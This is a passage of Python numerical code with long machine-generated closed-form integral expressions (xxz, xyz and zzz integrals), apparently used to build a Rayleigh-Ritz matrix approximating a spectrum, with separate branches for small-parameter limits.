                            + a_conj ** 2 * (-6 + 32 * b + 23 * b ** 2 + 15 * b ** 3)
                        )
                        + a ** 2
                        * (-1 + b)
                        * (
                            (-1 + b) ** 4 * b ** 2
                            + a_conj ** 2 * (-1 + b) ** 2 * b * (1 + 5 * b + 6 * b ** 2)
                            + a_conj ** 4
                            * (1 + 20 * b + 17 * b ** 2 + 13 * b ** 3 + 15 * b ** 4)
                        )
                        + a ** 4
                        * a_conj ** 2
                        * (
                            -1
                            - 19 * b
                            + 3 * b ** 2
                            + 4 * b ** 3
                            - 2 * b ** 4
                            + 15 * b ** 5
                            + a_conj ** 4 * (-3 + 22 * b + 23 * b ** 2 + 15 * b ** 3)
                            + a_conj ** 2
                            * (-6 - 6 * b + 54 * b ** 2 + 22 * b ** 3 + 20 * b ** 4)
                        )
                        + a ** 3
                        * (
                            a_conj * (-1 + b) ** 3 * b * (2 + 5 * b + 6 * b ** 2)
                            + a_conj ** 5
                            * (-3 - b + 32 * b ** 2 + 22 * b ** 3 + 20 * b ** 4)
                            + a_conj ** 3
                            * (
                                -2
                                - 33 * b
                                + 8 * b ** 2
                                + 14 * b ** 3
                                - 2 * b ** 4
                                + 15 * b ** 5
                            )
                        )
                    )
                )
                - ((a ** 2 + k_0 + a_conj ** 2) * (-1 + k_0 + b))
                / (k_2 * (1 + x ** 2) ** 2)
                - (2 * (a ** 2 + k_0 + a_conj ** 2)) / (k_2 * (1 + x ** 2))
                + (1 / (k_2 * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** 3))
                * (
                    np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
                    * (
                        (1 / (1 + x ** 2) ** 2)
                        * (
                            (k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                            * (
                                a ** 6 * a_conj ** 4
                                + a_conj ** 2 * (-1 + b) ** 4
                                + a ** 5 * a_conj ** 3 * (2 + a_conj ** 2 + 4 * b)
                                + a ** 2
                                * (
                                    (-1 + b) ** 4
                                    + 6 * a_conj ** 4 * b ** 2
                                    + 2 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 2 * b)
                                )
                                + a ** 4
                                * (
                                    a_conj ** 6
                                    + 6 * a_conj ** 2 * b ** 2
                                    + a_conj ** 4 * (2 + 4 * b)
                                )
                                + k_0
                                * (
                                    (-1 + b) ** 4
                                    + a_conj ** 2 * (-1 + b) ** 2 * (2 + 4 * b)
                                )
                                + 2
                                * a ** 3
                                * (
                                    a_conj ** 5 * (1 + 2 * b)
                                    + a_conj * (-1 + b) ** 2 * (1 + 2 * b)
                                    + a_conj ** 3 * (-1 + 3 * b ** 2)
                                )
                            )
                        )
                        + (1 / (1 + x ** 2))
                        * (
                            3 * a ** 7 * a_conj ** 5
                            + a_conj ** 2 * (-1 + b) ** 5
                            + a ** 6 * (3 * a_conj ** 6 + 13 * a_conj ** 4 * (1 + b))
                            + k_0
                            * (
                                (-1 + b) ** 5
                                + 7 * a_conj ** 2 * (-1 + b) ** 3 * (1 + b)
                            )
                            + a ** 5
                            * a_conj ** 3
                            * (
                                -2
                                + 3 * a_conj ** 4
                                + 22 * b
                                + 22 * b ** 2
                                + a_conj ** 2 * (21 + 13 * b)
                            )
                            + a ** 4
                            * (
                                13 * a_conj ** 6 * (1 + b)
                                + 2 * a_conj ** 4 * b * (19 + 11 * b)
                                + 18 * a_conj ** 2 * (-1 + b ** 3)
                            )
                            + a ** 2
                            * (
                                (-1 + b) ** 5
                                + 7 * a_conj ** 2 * (-1 + b) ** 3 * (1 + b)
                                + 18 * a_conj ** 4 * (-1 + b ** 3)
                            )
                            + a ** 3
                            * (
                                7 * a_conj * (-1 + b) ** 3 * (1 + b)
                                + a_conj ** 5 * (-2 + 22 * b + 22 * b ** 2)
                                + 2 * a_conj ** 3 * (-12 - b + 4 * b ** 2 + 9 * b ** 3)
                            )
                        )
                        - (1 / (b * (k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)))
                        * (
                            k_0
                            * (a + a_conj) ** 2
                            * (
                                a ** 6 * a_conj ** 6
                                + (-1 + b) ** 3 * b ** 2 * (b + x ** 2)
                                - a ** 5 * a_conj ** 5 * (-3 + 2 * b + x ** 2)
                                + a ** 4
                                * a_conj ** 4
                                * (3 - 17 * b ** 2 - 3 * x ** 2 - 3 * b * (-3 + x ** 2))
                                + k_2
                                * (
                                    1
                                    - 28 * b ** 3
                                    - 3 * x ** 2
                                    - 2 * b ** 2 * (-3 + x ** 2)
                                    - 12 * b * (-1 + x ** 2)
                                )
                                - k_3
                                * (
                                    17 * b ** 4
                                    + x ** 2
                                    - 2 * b ** 3 * (-3 + x ** 2)
                                    + 18 * b ** 2 * (-1 + x ** 2)
                                    + b * (-1 + 3 * x ** 2)
                                )
                                - k_0
                                * (-1 + b)
                                * b
                                * (
                                    2 * b ** 3
                                    + 6 * x ** 2
                                    + b ** 2 * (11 - 3 * x ** 2)
                                    + b * (-1 + 9 * x ** 2)
                                )
                            )
                        )
                    )
                )
                + (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
                * (
                    4
                    * (
                        a ** 4 * a_conj ** 2 * (-6 + a_conj ** 2)
                        - 6 * a_conj ** 2 * (1 + 3 * b + b ** 2)
                        + (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
                        + 4 * a ** 3 * (a_conj ** 3 * (-2 + b) - 3 * a_conj * (1 + b))
                        - 4
                        * k_0
                        * (2 + 7 * b + b ** 2 - b ** 3 + 3 * a_conj ** 2 * (1 + b))
                        - 2
                        * a ** 2
                        * (
                            3 * a_conj ** 4
                            + a_conj ** 2 * (9 + 7 * b - 3 * b ** 2)
                            + 3 * (1 + 3 * b + b ** 2)
                        )
                    )
                    * np.log(
                        k_0
                        - b
                        + (k_0 + b) ** 2
                        + k_1 * np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
                    )
                )
                + (
                    4
                    * (
                        a ** 4 * a_conj ** 2 * (-6 + a_conj ** 2)
                        - 6 * a_conj ** 2 * (1 + 3 * b + b ** 2)
                        + (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
                        + 4 * a ** 3 * (a_conj ** 3 * (-2 + b) - 3 * a_conj * (1 + b))
                        - 4
                        * k_0
                        * (2 + 7 * b + b ** 2 - b ** 3 + 3 * a_conj ** 2 * (1 + b))
                        - 2
                        * a ** 2
                        * (
                            3 * a_conj ** 4
                            + a_conj ** 2 * (9 + 7 * b - 3 * b ** 2)
                            + 3 * (1 + 3 * b + b ** 2)
                        )
                    )
                    * np.log(1 + x ** 2)
                )
                / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2)
                - (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
                * (
                    4
                    * (
                        a ** 4 * a_conj ** 2 * (-6 + a_conj ** 2)
                        - 6 * a_conj ** 2 * (1 + 3 * b + b ** 2)
                        + (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
                        + 4 * a ** 3 * (a_conj ** 3 * (-2 + b) - 3 * a_conj * (1 + b))
                        - 4
                        * k_0
                        * (2 + 7 * b + b ** 2 - b ** 3 + 3 * a_conj ** 2 * (1 + b))
                        - 2
                        * a ** 2
                        * (
                            3 * a_conj ** 4
                            + a_conj ** 2 * (9 + 7 * b - 3 * b ** 2)
                            + 3 * (1 + 3 * b + b ** 2)
                        )
                    )
                    * np.log(
                        k_0
                        - b
                        + (k_0 + b) ** 2
                        - x ** 2
                        - k_0 * x ** 2
                        + b * x ** 2
                        + np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
                        * np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
                    )
                )
            )
        )
        return (4 / 1j) * np.pi * c * ret
    else:
        # small-|a| regime: the integral vanishes here (no series fallback provided)
        return 0
def xxz_integral(a, b, c, x):
    """
    function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)

    NOTE(review): machine-generated closed-form algebra (presumably CAS-exported);
    do not hand-edit the expression — regenerate it instead. Three regimes are
    handled: generic a, a -> 0 with b away from 1, and a -> 0 with b near 1.
    @param a: complex parameter; enters mainly through k_0 = a * conj(a)
    @param b: parameter combined with k_0 inside the radicals and arctanh terms
    @param c: overall multiplicative constant applied to the result
    @param x: evaluation point of the expression
    @return: 2 * pi * c * ret in the generic regime, 4 * pi * c * ret otherwise
    """
    a_conj = np.conj(a)
    # helper variables to tidy up function
    k_0 = a * a_conj
    k_1 = a * a_conj ** 3
    k_2 = a ** 2 * a_conj ** 2
    k_3 = a ** 4 * a_conj ** 2
    # generic regime: expression divides by k_2 and b
    if abs(a_conj) >= 0.00000001:
        ret = (1 / 2) * (
            (1 / (k_2 * b * (k_2 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)) ** 3))
            * (
                np.sqrt((k_0 + b) ** 2)
                * (
                    (-(a ** 7)) * a_conj ** 5
                    + a_conj ** 2 * (-1 + b) ** 4 * b
                    - a ** 6 * a_conj ** 4 * (2 + 2 * a_conj ** 2 + b)
                    - a ** 5
                    * (
                        a_conj ** 7
                        + a_conj ** 5 * (4 - 8 * b)
                        + 2 * a_conj ** 3 * (23 - 2 * b) * b
                    )
                    + k_1 * (-1 + b) ** 2 * (1 + 12 * b + 5 * b ** 2)
                    - k_3
                    * (
                        -2
                        + 36 * b
                        + 4 * a_conj ** 2 * (16 - 9 * b) * b
                        + 38 * b ** 2
                        - 8 * b ** 3
                        + a_conj ** 4 * (2 + b)
                    )
                    + a ** 2
                    * (
                        (-1 + b) ** 4 * b
                        + 2 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 14 * b + 7 * b ** 2)
                        + a_conj ** 4 * (2 - 36 * b - 38 * b ** 2 + 8 * b ** 3)
                    )
                    + a ** 3
                    * (
                        2 * a_conj ** 5 * b * (-23 + 2 * b)
                        + a_conj * (-1 + b) ** 2 * (1 + 12 * b + 5 * b ** 2)
                        + a_conj ** 3 * (4 - 48 * b - 60 * b ** 2 + 40 * b ** 3)
                    )
                )
            )
            - (a ** 2 + a_conj ** 2) / (k_2 * (1 + x ** 2) ** 2)
            + (a ** 2 + a_conj ** 2) / (k_2 * (1 + x ** 2))
            + (1 / (k_2 * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** 3))
            * (
                np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
                * (
                    (
                        (k_2 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                        * (
                            a ** 5 * a_conj ** 3
                            + a_conj ** 2 * (-1 + b) ** 3
                            + 3 * k_3 * (1 + b)
                            + 3 * k_1 * (-1 + b ** 2)
                            + a ** 3
                            * a_conj
                            * (-3 + 4 * a_conj ** 2 + a_conj ** 4 + 3 * b ** 2)
                            + a ** 2
                            * (
                                4 * a_conj ** 2 * (-1 + b)
                                + (-1 + b) ** 3
                                + 3 * a_conj ** 4 * (1 + b)
                            )
                        )
                    )
                    / (1 + x ** 2) ** 2
                    - (1 / (1 + x ** 2))
                    * (
                        a ** 7 * a_conj ** 5
                        + a_conj ** 2 * (-1 + b) ** 4 * b
                        + a ** 6 * a_conj ** 4 * (4 + 5 * b)
                        + a ** 5
                        * a_conj ** 3
                        * (-24 + 12 * a_conj ** 2 + a_conj ** 4 + 8 * b + 10 * b ** 2)
                        + k_1 * (-1 + 4 * b - 8 * b ** 3 + 5 * b ** 4)
                        + k_3
                        * (
                            -28
                            - 30 * b
                            + 10 * b ** 3
                            + 12 * a_conj ** 2 * (-2 + 3 * b)
                            + a_conj ** 4 * (4 + 5 * b)
                        )
                        + a ** 3
                        * a_conj
                        * (
                            -1
                            + 4 * b
                            - 8 * b ** 3
                            + 5 * b ** 4
                            + 2 * a_conj ** 4 * (-12 + 4 * b + 5 * b ** 2)
                            + 4 * a_conj ** 2 * (-7 - 10 * b + 9 * b ** 2)
                        )
                        + a ** 2
                        * (
                            (-1 + b) ** 4 * b
                            + 4 * a_conj ** 2 * (-1 + b) ** 2 * (2 + 3 * b)
                            + 2 * a_conj ** 4 * (-14 - 15 * b + 5 * b ** 3)
                        )
                    )
                    + (1 / (b * (k_2 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)))
                    * (
                        k_0
                        * (a + a_conj) ** 2
                        * (
                            a ** 6 * a_conj ** 6
                            + a ** 5 * a_conj ** 5 * (2 + 2 * b - x ** 2)
                            - (-1 + b) ** 2
                            * b
                            * (
                                b
                                + 3 * b ** 3
                                + 3 * x ** 2
                                + 8 * b * x ** 2
                                + b ** 2 * (8 + x ** 2)
                            )
                            - 2
                            * a ** 3
                            * a_conj ** 3
                            * (
                                1
                                + 10 * b ** 3
                                + 6 * b * (-1 + x ** 2)
                                + b ** 2 * (-26 + 5 * x ** 2)
                            )
                            - a ** 4
                            * a_conj ** 4
                            * (5 * b ** 2 + 2 * x ** 2 + b * (-22 + 5 * x ** 2))
                            - k_2
                            * (
                                1
                                + 25 * b ** 4
                                - 2 * x ** 2
                                + 12 * b ** 2 * (-3 + 2 * x ** 2)
                                + 2 * b ** 3 * (-22 + 5 * x ** 2)
                                - 2 * b * (-5 + 6 * x ** 2)
                            )
                            + k_0
                            * (
                                -14 * b ** 5
                                + x ** 2
                                - 5 * b ** 4 * (-2 + x ** 2)
                                - 4 * b ** 3 * (-9 + 5 * x ** 2)
                                + 2 * b * (-1 + 8 * x ** 2)
                                + 2 * b ** 2 * (-7 + 12 * x ** 2)
                            )
                        )
                    )
                )
            )
            - (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
            * (
                4
                * (-1 + k_0 + b)
                * (
                    k_3 * (-6 + a_conj ** 2)
                    - 6 * a_conj ** 2 * (1 + 3 * b + b ** 2)
                    + (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
                    + 4 * a ** 3 * (a_conj ** 3 * (-2 + b) - 3 * a_conj * (1 + b))
                    - 4
                    * k_0
                    * (2 + 7 * b + b ** 2 - b ** 3 + 3 * a_conj ** 2 * (1 + b))
                    - 2
                    * a ** 2
                    * (
                        3 * a_conj ** 4
                        + a_conj ** 2 * (9 + 7 * b - 3 * b ** 2)
                        + 3 * (1 + 3 * b + b ** 2)
                    )
                )
                * np.arctanh(
                    (k_2 + (-1 + b) * b + a * (a_conj + 2 * a_conj * b))
                    / (
                        np.sqrt((k_0 + b) ** 2)
                        * np.sqrt(k_2 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                    )
                )
            )
            + (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
            * (
                4
                * (-1 + k_0 + b)
                * (
                    k_3 * (-6 + a_conj ** 2)
                    - 6 * a_conj ** 2 * (1 + 3 * b + b ** 2)
                    + (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
                    + 4 * a ** 3 * (a_conj ** 3 * (-2 + b) - 3 * a_conj * (1 + b))
                    - 4
                    * k_0
                    * (2 + 7 * b + b ** 2 - b ** 3 + 3 * a_conj ** 2 * (1 + b))
                    - 2
                    * a ** 2
                    * (
                        3 * a_conj ** 4
                        + a_conj ** 2 * (9 + 7 * b - 3 * b ** 2)
                        + 3 * (1 + 3 * b + b ** 2)
                    )
                )
                * np.arctanh(
                    (k_2 + k_0 * (1 + 2 * b - x ** 2) + (-1 + b) * (b + x ** 2))
                    / (
                        np.sqrt(k_2 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                        * np.sqrt(k_2 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
                    )
                )
            )
        )
        return 2 * np.pi * c * ret
    # a -> 0 limit, b bounded away from 1 (the (b - 1)**4 denominator is safe)
    if abs(a_conj) < 0.00000001 and (b - 1) ** 2 > 0.00000001:
        ret = (
            -1
            - (-1 + b) ** 2
            + b ** 2
            + (-1 + b) * (1 + 3 * b)
            + (-1 + b) ** 2 / (1 + x ** 2) ** 2
            + (1 + 2 * b - 3 * b ** 2) / (1 + x ** 2)
            + (b - b ** 3) / (b + x ** 2)
            - (1 + 4 * b + b ** 2) * np.log(b)
            - (1 + 4 * b + b ** 2) * np.log(1 + x ** 2)
            + (1 + 4 * b + b ** 2) * np.log(b + x ** 2)
        ) / (-1 + b) ** 4
        return 4 * np.pi * c * ret
    # degenerate a -> 0, b -> 1 limit
    if abs(a_conj) < 0.00000001 and (b - 1) ** 2 <= 0.00000001:
        ret = 2 * x ** 4 / (4 * (1 + x ** 2) ** 4)
        return 4 * np.pi * c * ret
def xyz_integral(a, b, c, x):
    """
    function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)

    NOTE(review): machine-generated closed-form algebra (presumably CAS-exported);
    do not hand-edit the expression — regenerate it instead.
    @param a: complex parameter; enters mainly through k_0 = a * conj(a)
    @param b: parameter combined with k_0 inside the radicals and logs
    @param c: overall multiplicative constant applied to the result
    @param x: evaluation point of the expression
    @return: (4 / 1j) * pi * c * ret when |conj(a)| >= 1e-8, otherwise 0
    """
    a_conj = np.conj(a)
    # helper variables to tidy up function
    k_0 = a * a_conj
    k_1 = a ** 2 * a_conj ** 2
    # expression divides by k_1 = a**2 * a_conj**2 and b, so guard the a -> 0 regime
    if abs(a_conj) >= 0.00000001:
        ret = (
            (1 / 4)
            * (a ** 2 - a_conj ** 2)
            * (
                (
                    np.sqrt((k_0 + b) ** 2)
                    * (
                        (-(a ** 5)) * a_conj ** 5
                        + (-1 + b) ** 4 * b
                        - a ** 4 * a_conj ** 4 * (2 + b)
                        + 2 * a ** 3 * a_conj ** 3 * b * (-23 + 2 * b)
                        + k_0 * (-1 + b) ** 2 * (1 + 12 * b + 5 * b ** 2)
                        + 2 * k_1 * (1 - 18 * b - 19 * b ** 2 + 4 * b ** 3)
                    )
                )
                / (k_1 * b * (k_1 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)) ** 3)
                - 1 / (k_1 * (1 + x ** 2) ** 2)
                + 1 / (k_1 * (1 + x ** 2))
                - (
                    (-1 + b) ** 4 * b * (b + x ** 2) ** 2 * (1 + b * x ** 2)
                    - a ** 7 * a_conj ** 7 * (1 - (-2 + b) * x ** 2 + x ** 4)
                    + a ** 6
                    * a_conj ** 6
                    * (
                        -2
                        - 3 * x ** 2
                        + 7 * b ** 2 * x ** 2
                        + x ** 6
                        - b * (3 + 4 * x ** 4)
                    )
                    + a ** 5
                    * a_conj ** 5
                    * (
                        21 * b ** 3 * x ** 2
                        + 2 * (x + x ** 3) ** 2
                        + b ** 2 * (1 + 26 * x ** 2 - 3 * x ** 4)
                        + b * (-50 - 61 * x ** 2 - 20 * x ** 4 + 6 * x ** 6)
                    )
                    + k_0
                    * (-1 + b) ** 2
                    * b
                    * (
                        x ** 2
                        + 7 * b ** 4 * x ** 2
                        + 10 * x ** 4
                        + 2 * x ** 6
                        + b ** 3 * (7 + 4 * x ** 2 + 11 * x ** 4)
                        + 2 * b ** 2 * (4 + 10 * x ** 2 + 9 * x ** 4 + 3 * x ** 6)
                        + b * (3 + 22 * x ** 2 + 15 * x ** 4 + 10 * x ** 6)
                    )
                    + a ** 3
                    * a_conj ** 3
                    * (
                        1
                        + 35 * b ** 5 * x ** 2
                        - 3 * x ** 4
                        - 2 * x ** 6
                        + 25 * b ** 4 * (1 + x ** 2) ** 2
                        + b * (14 + 55 * x ** 2 + 14 * x ** 4 - 36 * x ** 6)
                        + 2 * b ** 3 * (-60 - 83 * x ** 2 - 4 * x ** 4 + 10 * x ** 6)
                        + 2 * b ** 2 * (-45 - 54 * x ** 2 + 11 * x ** 4 + 16 * x ** 6)
                    )
                    + a ** 4
                    * a_conj ** 4
                    * (
                        35 * b ** 4 * x ** 2
                        + 2 * (1 + x ** 2) ** 2
                        + 5 * b ** 3 * (3 + 12 * x ** 2 + 2 * x ** 4)
                        + b ** 2 * (-132 - 170 * x ** 2 - 40 * x ** 4 + 15 * x ** 6)
                        + b * (-36 + 16 * x ** 2 + 59 * x ** 4 + 16 * x ** 6)
                    )
                    + k_1
                    * (
                        21 * b ** 6 * x ** 2
                        - (x + x ** 3) ** 2
                        + b ** 5 * (19 + 8 * x ** 2 + 24 * x ** 4)
                        + 2 * b ** 3 * (-33 - 62 * x ** 2 - 28 * x ** 4 + 10 * x ** 6)
                        + b ** 4 * (-38 - 43 * x ** 2 + 16 * x ** 4 + 15 * x ** 6)
                        - b * (-3 + 20 * x ** 2 + 52 * x ** 4 + 44 * x ** 6)
                        - b ** 2 * (-18 + 33 * x ** 2 + 122 * x ** 4 + 54 * x ** 6)
                    )
                )
                / (
                    k_1
                    * b
                    * (k_1 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)) ** 3
                    * (1 + x ** 2) ** 2
                    * np.sqrt(
                        (k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4
                    )
                )
                + (
                    24
                    * (-1 + k_0 + b)
                    * (1 + k_1 + 3 * b + b ** 2 + 2 * k_0 * (1 + b))
                    * np.log(
                        k_0
                        - b
                        + (k_0 + b) ** 2
                        + np.sqrt((k_0 + b) ** 2)
                        * np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
                    )
                )
                / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2)
                + (
                    24
                    * (-1 + k_0 + b)
                    * (1 + k_1 + 3 * b + b ** 2 + 2 * k_0 * (1 + b))
                    * np.log(1 + x ** 2)
                )
                / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2)
                - (
                    24
                    * (-1 + k_0 + b)
                    * (1 + k_1 + 3 * b + b ** 2 + 2 * k_0 * (1 + b))
                    * np.log(
                        k_1
                        - b
                        + b ** 2
                        - x ** 2
                        + b * x ** 2
                        + k_0 * (1 + 2 * b - x ** 2)
                        + np.sqrt(k_1 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                        * np.sqrt(k_1 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
                    )
                )
                / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2)
            )
        )
        return (4 / 1j) * np.pi * c * ret
    else:
        # small-|a| regime: the integral vanishes here (no series fallback provided)
        return 0
def zzz_integral(a, b, c, x):
    """
    function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)

    NOTE(review): machine-generated closed-form algebra (presumably CAS-exported);
    do not hand-edit the expression — regenerate it instead. Three regimes are
    handled: generic a, a -> 0 with b away from 1, and a -> 0 with b near 1.
    Unlike the sibling functions, no k_* helper variables are introduced here.
    @param a: complex parameter; appears only via a * conj(a) products
    @param b: parameter combined with a * conj(a) inside the radicals and logs
    @param c: overall multiplicative constant applied to the result
    @param x: evaluation point of the expression
    @return: 4 * c * pi * ret in every regime
    """
    a_conj = np.conj(a)
    # generic regime: expression divides by b and (a * a_conj + b)
    if abs(a_conj) >= 0.00000001:
        ret = (
            -(
                np.sqrt((a * a_conj + b) ** 2)
                * (
                    a ** 6 * a_conj ** 6
                    + 6 * a ** 5 * a_conj ** 5 * b
                    + 4 * a ** 3 * a_conj ** 3 * b * (-29 + 28 * b + 5 * b ** 2)
                    + a ** 4 * a_conj ** 4 * (-3 + 28 * b + 15 * b ** 2)
                    + (-1 + b) ** 2 * (-1 + 10 * b + 48 * b ** 2 + 30 * b ** 3 + b ** 4)
                    + 2
                    * a
                    * a_conj
                    * b
                    * (39 - 96 * b - 66 * b ** 2 + 56 * b ** 3 + 3 * b ** 4)
                    + 3
                    * a ** 2
                    * a_conj ** 2
                    * (1 - 24 * b - 78 * b ** 2 + 56 * b ** 3 + 5 * b ** 4)
                )
                / (
                    4
                    * b
                    * (a * a_conj + b)
                    * (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
                    ** 3
                )
            )
            + (
                a ** 7 * a_conj ** 7 * (1 + x ** 2) ** 2
                + a ** 6 * a_conj ** 6 * (7 * b - x ** 2) * (1 + x ** 2) ** 2
                + a ** 5
                * a_conj ** 5
                * (
                    -3 * (1 + x ** 2) ** 2
                    + 21 * b ** 2 * (1 + x ** 2) ** 2
                    + b * (28 + 42 * x ** 2 - 6 * x ** 6)
                )
                + a ** 4
                * a_conj ** 4
                * (
                    35 * b ** 3 * (1 + x ** 2) ** 2
                    + 3 * (x + x ** 3) ** 2
                    - 5 * b ** 2 * (-28 - 45 * x ** 2 - 6 * x ** 4 + 3 * x ** 6)
                    + b * (-119 - 194 * x ** 2 - 87 * x ** 4 + 12 * x ** 6)
                )
                + a ** 3
                * a_conj ** 3
                * (
                    3 * (1 + x ** 2) ** 2
                    + 35 * b ** 4 * (1 + x ** 2) ** 2
                    - 20 * b ** 3 * (-14 - 23 * x ** 2 - 4 * x ** 4 + x ** 6)
                    + 4 * b * (-18 + 17 * x ** 2 + 52 * x ** 4 + 21 * x ** 6)
                    + 2 * b ** 2 * (-175 - 270 * x ** 2 - 87 * x ** 4 + 24 * x ** 6)
                )
                + (-1 + b) ** 2
                * (
                    b ** 5 * (1 + x ** 2) ** 2
                    + (x + x ** 3) ** 2
                    + b ** 4 * (30 + 51 * x ** 2 + 12 * x ** 4 - x ** 6)
                    + 2 * b ** 3 * (24 + 53 * x ** 2 + 46 * x ** 4 + 5 * x ** 6)
                    + 2 * b ** 2 * (5 + 46 * x ** 2 + 53 * x ** 4 + 24 * x ** 6)
                    + b * (-1 + 12 * x ** 2 + 51 * x ** 4 + 30 * x ** 6)
                )
                + a
                * a_conj
                * (
                    -((1 + x ** 2) ** 2)
                    + 7 * b ** 6 * (1 + x ** 2) ** 2
                    + b ** 2 * (105 + 2 * x ** 2 - 327 * x ** 4 - 192 * x ** 6)
                    + b ** 5 * (140 + 234 * x ** 2 + 48 * x ** 4 - 6 * x ** 6)
                    + 4 * b ** 3 * (-62 - 99 * x ** 2 - 16 * x ** 4 + 33 * x ** 6)
                    + b ** 4 * (-143 - 158 * x ** 2 + 129 * x ** 4 + 48 * x ** 6)
                    - 2 * b * (-6 + 39 * x ** 2 + 88 * x ** 4 + 55 * x ** 6)
                )
                + a ** 2
                * a_conj ** 2
                * (
                    21 * b ** 5 * (1 + x ** 2) ** 2
                    - 3 * (x + x ** 3) ** 2
                    + b * (81 + 202 * x ** 2 + 65 * x ** 4 - 72 * x ** 6)
                    + 5 * b ** 4 * (56 + 93 * x ** 2 + 18 * x ** 4 - 3 * x ** 6)
                    + 6 * b ** 3 * (-61 - 86 * x ** 2 - 5 * x ** 4 + 12 * x ** 6)
                    + 2 * b ** 2 * (-132 - 131 * x ** 2 + 102 * x ** 4 + 93 * x ** 6)
                )
            )
            / (
                4
                * b
                * (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b)) ** 3
                * (1 + x ** 2) ** 2
                * np.sqrt(
                    (a * a_conj + b) ** 2
                    - 2 * a * a_conj * x ** 2
                    + 2 * b * x ** 2
                    + x ** 4
                )
            )
            + 3
            * (-1 + a * a_conj + b)
            * (
                a ** 4 * a_conj ** 4
                + 4 * a ** 3 * a_conj ** 3 * (-1 + b)
                + (-1 + b ** 2) ** 2
                + 2 * a ** 2 * a_conj ** 2 * (-5 - 4 * b + 3 * b ** 2)
                + 4 * a * a_conj * (-1 - 5 * b - b ** 2 + b ** 3)
            )
            * np.log(
                a * a_conj
                - b
                + (a * a_conj + b) ** 2
                + np.sqrt((a * a_conj + b) ** 2)
                * np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
            )
            / (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
            + 3
            * (-1 + a * a_conj + b)
            * (
                a ** 4 * a_conj ** 4
                + 4 * a ** 3 * a_conj ** 3 * (-1 + b)
                + (-1 + b ** 2) ** 2
                + 2 * a ** 2 * a_conj ** 2 * (-5 - 4 * b + 3 * b ** 2)
                + 4 * a * a_conj * (-1 - 5 * b - b ** 2 + b ** 3)
            )
            * np.log(1 + x ** 2)
            / (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
            - 3
            * (-1 + a * a_conj + b)
            * (
                a ** 4 * a_conj ** 4
                + 4 * a ** 3 * a_conj ** 3 * (-1 + b)
                + (-1 + b ** 2) ** 2
                + 2 * a ** 2 * a_conj ** 2 * (-5 - 4 * b + 3 * b ** 2)
                + 4 * a * a_conj * (-1 - 5 * b - b ** 2 + b ** 3)
            )
            * np.log(
                a * a_conj
                - b
                + (a * a_conj + b) ** 2
                - x ** 2
                - a * a_conj * x ** 2
                + b * x ** 2
                + np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
                * np.sqrt(
                    a ** 2 * a_conj ** 2
                    + 2 * a * a_conj * (b - x ** 2)
                    + (b + x ** 2) ** 2
                )
            )
            / (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
        )
        return 4 * c * np.pi * ret
    # a -> 0 limit, b bounded away from 1 (the (b - 1)**4 denominator is safe)
    if abs(a_conj) < 0.00000001 and (b - 1) ** 2 >= 0.00000001:
        ret = (
            4 * (-1 + b) ** 2
            - (-1 + b) * (1 + b) ** 3 / b
            - 4 * (-1 + b) * (1 + 3 * b)
            - 4 * (-1 + b) ** 2 / (1 + x ** 2) ** 2
            + 4 * (-1 + b) * (1 + 3 * b) / (1 + x ** 2)
            + (-1 + b) * (1 + b) ** 3 / (b + x ** 2)
            + 6 * (1 + b) ** 2 * np.log(b)
            - 6 * (1 + b) ** 2 * np.log(b + x ** 2)
            + 6 * (1 + b) ** 2 * np.log(1 + x ** 2)
        ) / (2 * (-1 + b) ** 4)
